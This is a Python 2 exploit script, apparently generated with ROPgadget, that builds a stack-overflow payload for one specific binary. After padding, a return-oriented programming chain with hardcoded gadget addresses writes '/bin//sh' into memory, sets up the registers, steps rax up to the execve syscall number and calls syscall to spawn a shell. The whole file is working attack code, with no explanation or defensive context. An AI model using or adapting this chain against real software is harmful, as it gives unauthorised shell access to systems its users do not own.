#!/usr/bin/env python2
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = 'A' * 0x58

p += pack('<Q', 0x000000000040f38e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c00e0) # @ .data
p += pack('<Q', 0x0000000000449257) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x000000000047b775) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040f38e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c00e8) # @ .data + 8
p += pack('<Q', 0x00000000004438b0) # xor rax, rax ; ret
p += pack('<Q', 0x000000000047b775) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040186a) # pop rdi ; ret
p += pack('<Q', 0x00000000004c00e0) # @ .data
p += pack('<Q', 0x000000000040f38e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c00e8) # @ .data + 8
p += pack('<Q', 0x000000000040176f) # pop rdx ; ret
p += pack('<Q', 0x00000000004c00e8) # @ .data + 8
p += pack('<Q', 0x00000000004438b0) # xor rax, rax ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004707a0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004012d3) # syscall

print p
